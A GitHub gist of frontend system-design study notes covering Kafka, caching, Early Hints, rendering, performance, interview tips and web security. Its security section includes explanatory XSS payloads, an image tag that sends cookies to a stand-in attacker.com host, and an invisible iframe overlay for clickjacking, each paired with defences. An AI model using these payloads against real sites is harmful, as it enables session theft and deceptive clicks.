Skip to content

Instantly share code, notes, and snippets.

@yogain123
Created July 28, 2024 06:01
Show Gist options
  • Save yogain123/d683f0c68f75c1d157a57c3f44b3f483 to your computer and use it in GitHub Desktop.
Save yogain123/d683f0c68f75c1d157a57c3f44b3f483 to your computer and use it in GitHub Desktop.
FE System Design
@yogain123
Copy link
Author

yogain123 commented Aug 5, 2024

Tiers of software architecture

  1. Single-Tier (Monolithic) Architecture:

    • Everything is in one place: user interface, business logic, and data storage.
    • The entire application runs on a single machine.
    • Database: Typically embedded within the application (e.g., using SQLite).
    • Example: A standalone desktop application that stores all its data locally.
  2. Two-Tier Architecture:

    • Divides the system into two parts: client and server.
    • Client Tier: Handles user interface and some business logic.
    • Server: The application logic and database often run on the same server. In some cases, they might be on separate servers, but they're still considered one tier
    • Database: Runs on the server, separate from the client.
    • Example: A desktop application connecting to a remote database server.
  3. Three-Tier Architecture:

    • Separates the application into three distinct layers.
    • Presentation Tier: User interface (e.g., web browser, mobile app).
    • Application Tier: Business logic and processing.
    • Data Tier: Database and data storage.
    • Each tier typically runs on its own server or set of servers.
    • Example: Most modern web applications.

@yogain123
Copy link
Author

yogain123 commented Aug 5, 2024

HLD - Photo Sharing app - Instagram

NamasteDev (8)

NamasteDev (8)

NamasteDev (8)

NamasteDev (8)

NamasteDev (8)

NamasteDev (8)

NamasteDev (8)


The Content-Disposition header is an HTTP response header used to indicate if the content should be displayed inline in the browser or treated as an attachment to be downloaded.

Common Syntax:

Content-Disposition: inline
Content-Disposition: attachment; filename="example.txt"

Key Parameters:

  1. inline: The content is displayed in the browser.
  2. attachment: The content is downloaded, often with a suggested filename (filename="example.txt").

Example Use:

  • To force a file download with a specific name:
Content-Disposition: attachment; filename="report.pdf"

This prompts the browser to download the file as "report.pdf".

@yogain123
Copy link
Author

yogain123 commented Aug 5, 2024

KAFKA

What is Kafka?

Apache Kafka is a distributed streaming platform designed to handle real-time data feeds with high throughput and fault tolerance. It is widely used for building real-time data pipelines and streaming applications.


How Kafka Works

  1. Topics: Data is organized into topics, which are similar to tables in a database.
  2. Producers: Producers send messages to Kafka topics.
  3. Consumers: Consumers subscribe to topics and process the messages.
  4. Brokers: Kafka clusters consist of brokers that manage message storage and distribution.
  5. Partitions: Topics are divided into partitions for scalability and parallel processing.

Zookeeper is also 1 thing which manages broker for scalability , like what kubernetes does for container/pods


Example Use Cases in Large-Scale Applications

  1. Log Aggregation: Collect logs from different services for centralized storage and analysis.
  2. Real-Time Analytics: Stream real-time user activity data for analytics.
  3. Data Integration: Bridge data between different systems like databases, microservices, or cloud platforms.
  4. Event Sourcing: Capture every state change in applications like e-commerce or finance systems.

JavaScript Example with KafkaJS

KafkaJS is a popular library for integrating Kafka with JavaScript. Below is an example of a simple Kafka producer and consumer.

Step 1: Install KafkaJS

npm install kafkajs

Step 2: Kafka Producer

const { Kafka } = require('kafkajs');

const kafka = new Kafka({
  clientId: 'my-app',
  brokers: ['localhost:9092']
});

const producer = kafka.producer();

const produceMessages = async () => {
  await producer.connect();
  for (let i = 0; i < 10; i++) {
    await producer.send({
      topic: 'test-topic',
      messages: [{ key: `key-${i}`, value: `message-${i}` }]
    });
    console.log(`Message ${i} sent!`);
  }
  await producer.disconnect();
};

produceMessages().catch(console.error);

Step 3: Kafka Consumer

const { Kafka } = require('kafkajs');

const kafka = new Kafka({
  clientId: 'my-app',
  brokers: ['localhost:9092']
});

const consumer = kafka.consumer({ groupId: 'test-group' });

const consumeMessages = async () => {
  await consumer.connect();
  await consumer.subscribe({ topic: 'test-topic', fromBeginning: true });

  await consumer.run({
    eachMessage: async ({ topic, partition, message }) => {
      console.log({
        topic,
        partition,
        key: message.key.toString(),
        value: message.value.toString()
      });
    }
  });
};

consumeMessages().catch(console.error);

How It Works

  1. The producer sends 10 messages to the test-topic.
  2. The consumer subscribes to test-topic and processes incoming messages.

Real-World Example in an Enterprise Application

Use Case: Real-Time Order Processing

  1. Producer: Microservices (e.g., e-commerce) publish order events to the orders topic.
  2. Consumer: A payment service consumes events from orders and processes payments.
  3. Stream Processing: Use Kafka Streams to aggregate and analyze order data for insights.

Note:

  • Databases throughput are generally less
  • Kafka throughput is high

Throughput means OPS -> Operation Per Second
if you do lots of OPS in your DB your DB will become down/crash


Redis is In memroy DB like memcached -> Redis keeps all data in RAM, making read and write operations extremely fast.

@yogain123
Copy link
Author

yogain123 commented Aug 6, 2024

Google crawler

Let me explain how Google's web search and indexing process works in a simple way:

  1. Constant Crawling:
    Google doesn't wait for you to search something to start crawling websites. Instead, it has programs called "web crawlers" or "spiders" that are constantly exploring the internet, 24/7.

  2. Indexing Process:
    As these crawlers visit websites, they read the content and store information about what they find in a huge database. This process is called indexing. It's like creating a massive library catalog of the internet.

  3. Regular Updates:
    Google's crawlers revisit websites periodically to check for changes or new content. How often they do this depends on various factors, like how frequently a site updates its content.

  4. When You Search:
    When you type a search query, Google doesn't start crawling the web at that moment. Instead, it quickly looks through its existing index (the catalog it has already created) to find the most relevant results.

  5. Real-time Indexing:
    For some very popular or frequently updated websites, Google may index changes almost instantly. But this is not the norm for most websites.

  6. Crawling Schedule:
    Google decides how often to crawl each website based on factors like:

    • How often the site's content changes
    • The site's importance or popularity
    • How many other sites link to it
  7. Crawl Budget:
    Google allocates a "crawl budget" to each website, which determines how much time and resources it spends crawling that site.

In summary, Google's indexing is an ongoing process that happens independently of your searches. When you search, you're essentially querying Google's existing index, which is constantly being updated in the background.

@yogain123
Copy link
Author

Screenshot 2024-08-07 at 10 43 48 AM

@yogain123
Copy link
Author

Screenshot 2024-08-07 at 10 49 42 AM Screenshot 2024-08-07 at 10 49 57 AM Screenshot 2024-08-07 at 10 50 02 AM Screenshot 2024-08-07 at 10 51 30 AM

@yogain123
Copy link
Author

HLD - E-commerce App (Amazon, Flipkart)

NamasteDev (9)

NamasteDev (9)

NamasteDev (9)

NamasteDev (9)

NamasteDev (9)

NamasteDev (9)

NamasteDev (9)

@yogain123
Copy link
Author

yogain123 commented Aug 7, 2024

The lang attribute in the HTML tag is used to specify the primary language of the document's content. It's an important attribute for accessibility, search engine optimization, and proper rendering of content.

Here's a brief overview:

  1. Usage: It's typically placed in the opening <html> tag.

  2. Format: It uses a language code, often followed by a country code.

  3. Example:

<html lang="en-US">

This indicates that the document is in English as used in the United States.

  1. Benefits:

    • Helps screen readers pronounce content correctly
    • Assists search engines in indexing and serving content
    • Enables browsers to display language-specific quotation marks or other typographic features
  2. Common language codes:

    • "en" for English
    • "es" for Spanish
    • "fr" for French
    • "de" for German
    • "zh" for Chinese

@yogain123
Copy link
Author

yogain123 commented Aug 7, 2024

To improve Performance

NamasteDev (9)

HSTS stands for HTTP Strict Transport Security.
When a domain is on this list, browsers will always use HTTPS to connect to it, even before the first request.

Like when you hit http://flipkart.com
the 1st request will be sent to https://flipkart.com , not http://flipkart.com, thus avoid redirect and improve performnace
it only work for domain which are listed themself in this, like google is not listed itself, so request 1st from http://www.google.com will still go to http://www.google.com only, and then server will respond will redirect status code 302, and location to redirect https://www.google.com

Resource Hinting (Early Hints)

NamasteDev (9)

This image explains different resource hint techniques used in web development to optimize page loading and performance. Let me break down each technique:

  1. Preconnect:

    • Purpose: Connect to a specific cross-origin server in advance
    • Example: <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    • This establishes an early connection to the specified server, reducing latency for subsequent requests.
  2. DNS-prefetch:

    • Purpose: Perform DNS lookup in advance
    • Example: <link rel="dns-prefetch" href="https://fonts.gstatic.com">
    • This resolves the domain name to an IP address ahead of time, speeding up future requests.
  3. Preload:

    • Purpose: Initiate early request to a resource needed for rendering the page
    • Example: <link rel="preload" href="/font.woff2" as="font" crossorigin>
    • This tells the browser to load the specified resource as soon as possible, as it will be needed soon.
  4. Prefetch:

    • Purpose: Load resources which may be needed in the near future, with low priority
    • Example: <link rel="prefetch" href="/next-page.css" as="style">
    • This is used for resources that might be needed for future navigation, loaded with low priority.
  5. Prerender:

    • Purpose: Load an entire page and all its dependencies in the background (hidden from view)
    • Example: <link rel="prerender" href="blog.html">
    • This prepares a complete page in the background, making it instantly available if the user navigates to it.

These techniques are collectively referred to as "Resource Hint Priority" methods. They allow developers to guide the browser in optimizing the loading process, potentially improving page load times and user experience.


Early Hints
Early Hints (HTTP status 103) is a technique where the server sends preliminary headers before the main response. It's used to inform the browser about critical resources early, allowing it to begin loading them sooner.

Key points:

  1. Sent in response headers
  2. Uses HTTP status code 103
  3. Contains Link headers for resource hints (like preload, preconnect)
  4. Followed by the main response (e.g., 200 OK)
  5. Aims to improve perceived page load times

Example:

HTTP/1.1 103 Early Hints
Link: </style.css>; rel=preload; as=style

HTTP/1.1 200 OK
[Main response follows]

Early Hints are indeed sent in the response headers, specifically as an initial response before the full content response.

@yogain123
Copy link
Author

yogain123 commented Aug 7, 2024

What Are Early Hints?


When a client (e.g., a browser) sends a request to a server, the server may take some time to process the request and generate the full response. With the 103 Early Hints status code, the server can send a preliminary response with hints about resources that the browser should preload or preconnect to while the main response is being prepared.

This allows the browser to:

  • Fetch CSS, JavaScript, images, or fonts earlier.
  • Establish connections (e.g., DNS lookups, TCP handshakes, and TLS negotiations) to required resources.

How It Works

  1. Client Request:

    GET /index.html HTTP/1.1
    Host: example.com
  2. Server Response (Early Hints):

    HTTP/1.1 103 Early Hints
    Link: </style.css>; rel=preload; as=style
    Link: </script.js>; rel=preload; as=script
  3. Final Response:

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 1234
    
    <html>
    <head>
      <link rel="stylesheet" href="/style.css">
      <script src="/script.js"></script>
    </head>
    <body>
      ...
    </body>
    </html>

Key Points:

  1. Status Code: 103 Early Hints indicates that the server is sending early hints to the client.
  2. Link Header: Used to specify resources that should be preloaded or preconnected.
    • rel=preload: Tells the browser to fetch the resource.
    • as=style/script/image: Specifies the type of resource being preloaded.

Example in Action:

For a webpage with large CSS and JavaScript files, early hints can significantly speed up page rendering:

Without Early Hints:

  1. Browser waits for the server's full response.
  2. Only after receiving the HTML, the browser parses it, discovers <link> and <script>, and begins fetching the resources.

With Early Hints:

  1. Browser starts preloading style.css and script.js immediately upon receiving the 103 Early Hints.
  2. By the time the full HTML arrives, the browser may have already fetched and processed some of the resources.

Benefits:

  1. Reduced Load Time: Preloading critical resources accelerates page rendering.
  2. Efficient Resource Usage: Reduces idle time during server processing.
  3. Improved User Experience: Faster loading creates a smoother experience.

Use Cases:

  • Modern web applications leveraging critical assets (CSS, JS, or fonts).
  • Websites with a server-side rendering process that takes noticeable time.

Would you like to see how to implement 103 Early Hints in a specific server (e.g., Nginx, Node.js)?

@yogain123
Copy link
Author

yogain123 commented Aug 11, 2024

Rendering Patters

NamasteDev (9)

NamasteDevvv

@yogain123
Copy link
Author

yogain123 commented Jan 14, 2025

Optimize Webpage for Performance

To optimize a website's frontend, focus on these key areas:

  1. Performance Optimization:

    • Minify and bundle CSS, JS, and HTML.
    • Enable Gzip or Brotli compression to reduce file sizes.
    • Use a CDN to deliver static assets faster.
  2. Image Optimization:

    • Use modern formats like WebP.
    • Compress images and serve responsive images with srcset.
    • Lazy load images and videos using loading="lazy".
    • <img src="https://example.com/image.jpg" alt="Example Image" width="600" height="400" loading="lazy">
  3. Script Management:

    • Use async or defer for non-critical JavaScript to prevent render-blocking.
    • Implement code splitting to load only required resources.
  4. Caching:

    • Leverage browser caching and use long expiration headers for static files.
    • Use versioned file names for cache invalidation.
    • Service Workers: Cache key assets and enable offline functionality with Progressive Web Apps (PWA).
  5. Rendering & DOM Optimization:

    • Reduce DOM complexity and remove unused CSS/JS.
    • Minimize layout thrashing and batch DOM updates.
  6. Accessibility & SEO:

    • Use semantic HTML, ARIA roles, responsive design, and proper metadata.
  7. Monitoring & Analysis:

    • Use tools like Lighthouse, WebPageTest, and Chrome DevTools for performance insights.
  • Virtualization
  • Shimmer Loading
  • Etag
  • Caching
  • Optimistic update

Optimiing images

What is a WebP Image?

1. Smaller File Sizes
2. Faster Page Load Speeds
3. SEO and Core Web Vitals

  • Google recommends using WebP for better performance, which can improve search rankings.

How to Use WebP for Optimization?

  1. Convert Images to WebP

  2. Serve WebP with Fallbacks

    <picture>
        <source srcset="image.webp" type="image/webp">
        <img src="image.jpg" alt="Fallback image">
    </picture>
    • This ensures compatibility with browsers that don’t support WebP.
  3. Enable WebP via a CDN

    • Services like Cloudflare, Imgix, and Cloudinary automatically convert images to WebP.
  4. Use WebP in CSS

    .background {
        background-image: url('image.webp');
    }

WebP Browser Support

Supported: Chrome, Edge, Firefox, Opera, Android, Safari (from macOS 11, iOS 14).
Not Supported: Older versions of Internet Explorer.

Conclusion

WebP is a game-changer for web performance optimization, reducing image sizes while maintaining quality. Implementing WebP can improve site speed, user experience, and SEO, making it a must-have for modern web development. 🚀

@yogain123
Copy link
Author

yogain123 commented Jan 18, 2025

Security

Security headers are crucial for protecting web applications from various threats. Below is a list of key security headers that frontend developers should consider implementing:


1. Content Security Policy (CSP)

  • Purpose: Prevents Cross-Site Scripting (XSS), data injection attacks, and other code-injection vulnerabilities.
  • Example:
    Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.example.com; style-src 'self' 'unsafe-inline'

2. Strict-Transport-Security (HSTS)

  • Purpose: Enforces HTTPS connections, protecting against protocol downgrade attacks and cookie hijacking.
  • Example:
    Strict-Transport-Security: max-age=31536000; includeSubDomains

3. X-Frame-Options

  • Purpose: Protects against clickjacking by controlling whether your site can be embedded in an iframe.
  • Example:
    X-Frame-Options: DENY

4. Cache-Control

  • Purpose: Controls caching behavior to prevent sensitive data from being stored improperly.
  • Example:
    Cache-Control: no-store, no-cache, must-revalidate

@yogain123
Copy link
Author

yogain123 commented Jan 18, 2025

What is an XSS Attack?

XSS (Cross-Site Scripting) is a security vulnerability where attackers inject malicious scripts into web pages viewed by other users. This script can steal sensitive information (e.g., cookies, session data), manipulate the DOM, or even perform unauthorized actions.


How XSS Happens?

  1. JavaScript:
    An attacker injects a script that runs in the victim's browser.

    // Attacker injects this script via input or URL
    <script>alert('Hacked!');</script>
  2. HTML:
    Malicious content is included in inputs and rendered as part of the page.

    <input value="<script>alert('Hacked!');</script>">

How to Mitigate XSS?

  1. Sanitize Inputs:
    Remove or escape special characters in user input.

    const sanitizeInput = (input) => input.replace(/</g, "&lt;").replace(/>/g, "&gt;");
  2. Use Content Security Policy (CSP):
    Restricts the sources of executable scripts.

    Content-Security-Policy: script-src 'self';
  3. Avoid innerHTML:
    Use safer DOM manipulation methods like textContent.

    // Unsafe
    element.innerHTML = userInput;
    // Safe
    element.textContent = userInput;
  4. Validate and Escape Outputs:
    Ensure all data rendered to the page is safe.

  5. Use Secure Libraries:
    Libraries like React automatically escape inputs to prevent XSS.

By following these steps, you can protect your application from XSS attacks.

How XSS Can Steal Cookies Using <img> Tag

Attackers can inject a malicious <img> tag with a fake src attribute to steal cookies. Here's an example:

<img src="http://attacker.com/steal?cookie=document.cookie" />
  • When the browser renders this, the src attribute sends the user’s cookies to the attacker’s server (http://attacker.com/steal).
  • The document.cookie fetches all cookies stored for the domain, including session cookies.

What is CSP (Content Security Policy)?

CSP (Content Security Policy) is a browser feature that helps mitigate XSS and other injection attacks by defining where scripts, styles, or other resources can be loaded from.

How CSP Works

CSP lets you control:

  • Script sources (script-src)
  • Style sources (style-src)
  • Image sources (img-src)
  • And more...

If a script or resource violates the CSP rules, the browser blocks it.


Common Used CSP
Certainly! Here are the most commonly used Content Security Policy (CSP) directives for website security:

  1. default-src (Default Policy)

    • Defines the default source for all content types if no specific directive is set.
    • Example:
      Content-Security-Policy: default-src 'self'
      • Allows loading content only from the same origin.
  2. script-src (JavaScript Security)

    • Controls allowed sources for JavaScript.
    • Example:
      Content-Security-Policy: script-src 'self' https://apis.example.com
      • Allows scripts only from the same origin and https://apis.example.com.
  3. style-src (CSS Security)

    • Defines allowed sources for styles.
    • Example:
      Content-Security-Policy: style-src 'self' 'unsafe-inline'
      • Allows styles from the same origin and inline styles (not recommended but commonly used).
  4. img-src (Image Control)

    • Specifies allowed sources for images.
    • Example:
      Content-Security-Policy: img-src 'self' data:
      • Allows images from the same origin and base64-encoded images.
  5. font-src (Font Security)

    • Defines allowed sources for web fonts.
    • Example:
      Content-Security-Policy: font-src 'self' https://fonts.gstatic.com
      • Allows fonts from the same origin and Google Fonts.
  6. frame-src (iFrame Security)

    • Specifies allowed sources for embedding in <iframe>.
    • Example:
      Content-Security-Policy: frame-src 'none'
      • Blocks embedding of the site in any iframe (prevents clickjacking).

These directives are fundamental in defining a robust CSP to enhance your website's security.

@yogain123
Copy link
Author

yogain123 commented Jan 18, 2025

What is an Iframe Attack?

1. What Is an Iframe and How Is It Used?

  • Iframes in a Nutshell:
    An iframe is an HTML element (<iframe>) that lets you embed another webpage within your page. For example, you might embed a YouTube video or a Google Map on your site using an iframe.

  • Legitimate Use:
    Iframes are perfectly fine for showing external content. But they can be abused if not properly secured.

2. What Is a Clickjacking Attack?

  • Clickjacking Defined:
    Clickjacking is when an attacker tricks a user into clicking on something different from what they perceive. Essentially, they “hijack” your clicks.

  • How It Works With Iframes:
    An attacker can load your website (or a sensitive part of it) into an iframe on their own malicious webpage. They might then overlay that iframe with transparent elements or misleading buttons.

3. How Could This Happen to Your Website?

Imagine you have a website with a critical button (say, to approve a payment or change settings). Here’s how an attacker might use an iframe to attack it:

  • Embedding Your Site:
    The attacker creates a webpage that includes an invisible iframe of your website. For example:

    <!-- A visible button on the attacker's page -->
    <button>Click here for a free prize!</button>
    
    <!-- An invisible iframe covering the page -->
    <iframe src="https://your-website.com/critical-action" 
            style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%;">
    </iframe>
  • User Interaction:
    The user sees a nice button and clicks it, thinking they are claiming a prize. However, because the invisible iframe is on top, the click is actually sent to your website’s sensitive action. The user unknowingly triggers the action on your site.

4. How Can Attackers Do This?

  • Misleading the User:
    They design a webpage that appears harmless or enticing.

  • Overlaying Elements:
    They use CSS (like opacity:0, absolute positioning, etc.) to place an iframe containing your site’s content over something else. The user sees only what the attacker wants them to see, while the real clickable area is hidden.

  • Exploiting Trust:
    Since your website might be trusted by the user (they might be logged in or have certain privileges), clicking on hidden elements can lead to unintended actions like making purchases, changing settings, or even more dangerous actions if your site allows sensitive operations.

5. How to Prevent Iframe (Clickjacking) Attacks

To protect your website from being embedded in an attacker’s iframe, you can use several measures:

  • X-Frame-Options HTTP Header:
    This header tells browsers whether your site can be embedded in an iframe. For example:

    • DENY – Your site cannot be embedded anywhere.
    • SAMEORIGIN – Your site can only be embedded in pages from the same domain.

    Example (for Apache):

    Header set X-Frame-Options "DENY"
  • Content Security Policy (CSP):
    Use the frame-ancestors directive to specify which domains are allowed to embed your site.

    Example:

    Content-Security-Policy: frame-ancestors 'self' https://trusted-site.com;
  • Sandbox Attribute for Iframes:
    If you do need to use iframes to embed content, add the sandbox attribute to limit what the embedded content can do.

    Example:

    <iframe src="https://example.com" sandbox="allow-scripts allow-forms"></iframe>

sandbox - If you’re embedding third-party or untrusted content, sandboxing ensures that even if that content is compromised, it can’t harm your website or users.

Hackers don’t “want to use” the sandbox attribute because it works against their goals. They typically look for vulnerabilities in sites that don’t restrict iframe behavior. By not using sandboxing (or similar security measures like X-Frame-Options or Content Security Policy), a website might allow its content to be embedded and manipulated in ways that facilitate attacks (for example, clickjacking).

An iframe is an HTML element that embeds another HTML document within your current document. When you add an iframe, the browser creates a new, nested browsing context with its own window and document objects that are separate from the parent page. This means that—if allowed by same‑origin rules—the iframe’s content runs in its own “mini‑browser” environment.

Below is an explanation along with code examples to illustrate how iframes work and how you can access their window object:


1. How Iframes Work

An iframe (inline frame) is an HTML element that embeds another HTML document within your current document. When an iframe is added:

  • The browser creates a nested browsing context (a separate window and document).
  • It can load content from an external URL (via the src attribute) or inline HTML (using the srcdoc attribute).

Basic Example

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Parent Document</title>
  </head>
  <body>
    <h1>Parent Document</h1>
    <iframe id="myIframe" src="iframe-content.html" width="400" height="200" style="border:1px solid #ccc;"></iframe>
  </body>
</html>

And the embedded document (iframe-content.html):

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Iframe Content</title>
    <script>
      // A function in the iframe that could be called from the parent if same-origin
      function someFunction() {
        console.log("Function inside iframe called!");
      }
    </script>
  </head>
  <body>
    <h2>This is the iframe content</h2>
    <p>The iframe runs in its own window.</p>
  </body>
</html>

Key Point:
If both the parent and iframe are from the same origin (same protocol, domain, and port), the parent can access the iframe’s contentWindow and contentDocument. If they differ (cross‑origin), direct access is blocked by the browser’s same-origin policy.


2. Iframe Security and Vulnerabilities

Clickjacking and Iframe Attacks

  • Clickjacking:
    An attacker might overlay a transparent iframe over a visible button so that when a user clicks what they see, the click actually interacts with the hidden iframe. This can trick users into performing unintended actions.

  • Mitigation Techniques:
    Use HTTP headers such as X-Frame-Options (with values like DENY or SAMEORIGIN) or a Content Security Policy (CSP) with the frame-ancestors directive to prevent your site from being embedded in unauthorized iframes.


3. Advanced Iframe Features

A. The srcdoc Attribute

The HTML5 srcdoc attribute allows you to embed HTML content directly into an iframe. Instead of loading a document from a URL, you supply the HTML code as a string.

Example

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Using srcdoc</title>
  </head>
  <body>
    <h1>Parent Document</h1>
    <iframe
      srcdoc="
        <!DOCTYPE html>
        <html>
          <head>
            <meta charset='UTF-8'>
            <title>Iframe via srcdoc</title>
            <style>
              body { background-color: #f0f0f0; font-family: sans-serif; }
            </style>
          </head>
          <body>
            <h2>Hello from srcdoc!</h2>
            <p>This content is embedded directly.</p>
          </body>
        </html>"
      width="400"
      height="200"
      style="border: 1px solid #ccc;">
    </iframe>
  </body>
</html>

Benefit:
No extra HTTP request is needed because the iframe content is defined inline.


B. Cross-Window Communication with postMessage

When the iframe and its parent are either from different origins or when direct DOM access is not allowed, the postMessage API lets them securely exchange messages.

How It Works

  • Sender:
    Calls targetWindow.postMessage(message, targetOrigin).

    • message can be a string or structured object.
    • targetOrigin should be set to the expected origin for security (using "*" is discouraged).
  • Receiver:
    Sets up an event listener for the message event and checks event.origin to verify the sender.

Example: Parent-to-Child Communication

Parent Page (e.g., https://parent.example.com/):

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Parent Document</title>
  </head>
  <body>
    <h1>Parent Document</h1>
    <iframe id="childFrame" src="https://child.example.com/child.html" width="400" height="200" style="border:1px solid #ccc;"></iframe>
    <button id="sendBtn">Send Message to Iframe</button>

    <script>
      const iframe = document.getElementById('childFrame');

      iframe.addEventListener('load', () => {
        // Send message to the child iframe; specify its exact origin for security.
        iframe.contentWindow.postMessage('Hello from Parent!', 'https://child.example.com');
      });

      window.addEventListener('message', (event) => {
        if (event.origin !== 'https://child.example.com') {
          console.warn('Origin mismatch:', event.origin);
          return;
        }
        console.log('Parent received:', event.data);
      });
    </script>
  </body>
</html>

Child Page (child.html, served from https://child.example.com/):

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Child Iframe</title>
  </head>
  <body>
    <h2>Child Document</h2>
    <button id="replyBtn">Reply to Parent</button>
    <script>
      window.addEventListener('message', (event) => {
        if (event.origin !== 'https://parent.example.com') {
          console.warn('Origin mismatch:', event.origin);
          return;
        }
        console.log('Child received:', event.data);
      });

      document.getElementById('replyBtn').addEventListener('click', () => {
        window.parent.postMessage('Hello from Child!', 'https://parent.example.com');
      });
    </script>
  </body>
</html>

Key Points:

  • Even when the documents are from different origins, they can exchange messages using postMessage.
  • Always validate the event.origin on the receiving end for security.

C. The sandbox Attribute

The sandbox attribute adds extra restrictions to the content of an iframe to enhance security. By default, when sandbox is applied (without additional tokens), it:

  • Treats the content as being from a unique origin (even if it normally wouldn’t be).
  • Disables script execution.
  • Blocks form submission.
  • Prevents the content from navigating the top-level window, among other restrictions.

Relaxing Sandbox Restrictions

You can selectively relax these restrictions by adding tokens such as:

  • allow-scripts — to permit scripts to run.
  • allow-same-origin — to treat the iframe content as if it were from the same origin (enabling direct DOM access from the parent).
  • allow-forms — to allow form submissions.
  • allow-popups — to permit popups.

4. Access Between Iframe and Parent

  • Accessing the Parent:
    In a same‑origin situation, code inside the iframe can refer to the parent window using window.parent. For example:

    <script>
      // Inside the iframe
      console.log("Parent title:", window.parent.document.title);
    </script>
  • Restrictions with Cross-Origin:
    If the iframe is from a different origin, direct access (like reading window.parent.document) is blocked by the browser’s same-origin policy. In such cases, postMessage is the only secure way to exchange data.

@yogain123
Copy link
Author

yogain123 commented Jan 23, 2025

How to Approach FE HLD

Approach for Frontend HLD Interview Round:

  1. Start: List functional and non-functional requirements.
  2. Architecture: Present a high-level architecture diagram (focus on client-side: view, controller, service, storage).
  3. Component Architecture
  4. Data Model: Define the data structure.
  5. APIs: Outline the required APIs.
  6. Details: Discuss optimizations, internationalization, SEO or other key requirements as per interviewer focus.
Screenshot 2025-02-04 at 4 08 07 PM

All Non Functional Requirement

1. Performance

  • Ensure fast load times (<3s), low latency (<100ms), optimized assets, and efficient rendering.

2. Scalability

  • Handle increased traffic and allow modular component-based development for future growth.

3. Security

  • Implement secure authentication (OAuth, JWT), protect against XSS/CSRF, and enforce CSP.

4. Accessibility (A11y)

  • Ensure WCAG 2.1 compliance, keyboard navigation, and support for assistive technologies.

5. Cross-Browser Compatibility

  • Test and ensure consistent functionality across all major browsers and versions.

6. Offline Support

  • Use service workers for caching and provide offline functionality with sync capabilities.

7. Responsive Design

  • Support various devices, screen sizes, and orientations with mobile-first design.

8. Localization (i18n)

  • Enable multi-language support, including RTL, and adapt formats for dates and currencies.

9. Usability and UX

  • Provide intuitive navigation, consistent UI, and smooth animations for a great user experience.

10. Rendering Approach

  • Choose CSR, SSR, SSG, or ISR based on performance, SEO, and interactivity needs.

11. Caching

  • Use browser caching, IndexedDB, and CDNs to reduce server load and enhance speed.

12. Testing

  • Perform unit, integration, and end-to-end testing using tools like Jest and Cypress.

13. Availability and Reliability

  • Ensure zero-downtime deployments, graceful error handling, and fallback mechanisms.

14. Logging and Monitoring

  • Track errors and monitor performance using tools like Sentry or LogRocket.

15. SEO and Social Sharing

  • Optimize meta tags, implement SSR/SSG, and ensure proper sitemap and robots.txt.

16. Deployment

  • Use CI/CD for automated builds, cache-busting, and rollback strategies for fault recovery.

{
  "status": "success",
  "message": "Document fetched successfully",
  "data": {
    "documentId": "abc123",
    "title": "Design Doc",
    "content": "<h1>Hello World</h1>",
    "users": [
      { "id": "user1", "name": "Alice", "cursorPosition": 120 },
      { "id": "user2", "name": "Bob", "cursorPosition": 200 }
    ],
    "lastUpdated": "2025-02-06T10:00:00Z"
  },
  "timestamp": "2025-02-06T10:05:00Z"
}
{
  "status": "error",
  "errorCode": "DOCUMENT_NOT_FOUND",
  "message": "The requested document does not exist",
  "details": "Document with ID 'xyz789' was not found in the database",
  "timestamp": "2025-02-06T10:05:00Z"
}

@yogain123
Copy link
Author

Behavioural Rounds

The STAR Method is a structured approach used to answer behavioral interview questions effectively. It helps you present your experiences clearly and concisely, focusing on real-world examples.


STAR Method Breakdown:

  1. S - Situation

    • Describe the context or background of the scenario.
    • Where were you? What was the challenge? Who was involved?
  2. T - Task

    • Explain your specific role and responsibility in that situation.
    • What was expected of you? What were the challenges?
  3. A - Action

    • Describe the specific actions you took to address the challenge.
    • Focus on your contributions, not just the team's.
    • Highlight technical decisions, collaboration, and problem-solving skills.
  4. R - Result

    • Share the outcome of your actions.
    • Quantify results if possible (e.g., improved performance by 20%, reduced errors by 50%).
    • Mention key takeaways and lessons learned.

Example STAR Response (Frontend Engineer - Performance Optimization)

Question:

"Tell me about a time when you improved the performance of a web application."

S - Situation:

"At my previous company, we had a React-based web app that was experiencing slow load times, especially for users with slower internet connections. Our Lighthouse performance score was around 50-60, and customers reported laggy interactions."

T - Task:

"My responsibility was to identify and implement optimizations to improve performance without breaking existing features."

A - Action:

"I started by running performance audits using Lighthouse and WebPageTest to identify bottlenecks. I found that large JavaScript bundles, unoptimized images, and excessive re-renders were the main issues. To fix this, I:"

  • Implemented code-splitting using React’s React.lazy() and Suspense.
  • Optimized images using WebP format and lazy loading.
  • Reduced unnecessary re-renders by properly using useMemo and useCallback.
  • Enabled server-side rendering (SSR) in Next.js for faster initial loads.
  • Cached API responses with React Query to reduce redundant network calls.

R - Result:

"As a result, the app’s Lighthouse performance score improved from 60 to 95. The first contentful paint (FCP) time reduced by 40%, and time to interactive improved significantly. Customer complaints about slow load times dropped by 50%. My optimizations were later adopted across other projects in the company."


STAR Example: Handling Conflict in a Team

Question:

"Tell me about a time you had a conflict with a team member. How did you resolve it?"


S - Situation:

"In one of my projects, I was working with another frontend developer on a React-based dashboard. We had different opinions on state management—he preferred Redux, while I suggested React Query for better API caching and performance. This led to disagreements, delaying development progress."

T - Task:

"As a team member responsible for frontend architecture, it was my job to ensure we made the best technical choice while maintaining team harmony."

A - Action:

"Instead of arguing, I suggested a data-driven approach. I proposed a technical comparison where we evaluated Redux vs. React Query based on:"

  • Performance impact (memory usage, re-renders, and API calls).
  • Ease of use (boilerplate code, debugging, and maintainability).
  • Scalability (how well it fits our project needs).

"I created a small POC (proof of concept) implementing both approaches and shared the results with the team. We also considered feedback from backend engineers regarding API caching."

R - Result:

"The data showed that React Query reduced API calls by 40%, simplified state management, and improved performance. My teammate appreciated the approach, and we collaboratively agreed to use React Query. The experience strengthened our professional relationship, and our team adopted a similar decision-making strategy for future debates."

@yogain123
Copy link
Author

Making SEO better

🔹 Meta Title (<title> tag)
<title>Best SEO Tips & Strategies for Higher Rankings | MyWebsite</title>

🔹 Meta Description ()
<meta name="description" content="Learn the best SEO tips, strategies, and techniques to rank higher on Google. Improve your website’s visibility with expert insights.">

